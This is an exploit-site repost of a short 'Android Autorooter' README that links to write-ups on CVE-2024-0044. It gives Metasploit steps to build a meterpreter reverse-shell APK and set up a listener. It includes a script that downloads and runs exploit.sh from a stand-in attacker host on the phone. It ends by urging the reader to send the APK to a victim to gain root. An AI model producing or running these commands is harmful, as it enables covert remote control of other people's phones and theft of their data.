Share
## https://sploitus.com/exploit?id=5C855871-83A4-5907-9094-D548A3545C40
# Android Autorooter

This is just a mental note more than anything to further explore the posibilities of the work done here:
https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html
https://tinyhack.com/2024/06/07/extracting-whatsapp-database-or-any-app-data-from-android-12-13-using-cve-2024-0044/?s=03
https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/

Ultimately I'd like to have a self executing exploit but babysteps yeah..

## Give this a try

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk
```

Create a resource script execute_script.rc to automate the commands:
```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc
```

Create the resource script with the necessary commands:
```
cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh
```

Start Metasploit with the resource script:
```
msfconsole -r execute_script.rc
```
Get the party started with:
```
msfconsole -r execute_script.rc
```

Now your listener/payload delivery is set up...  Send that payload.apk to the victim.. Lets get some root baby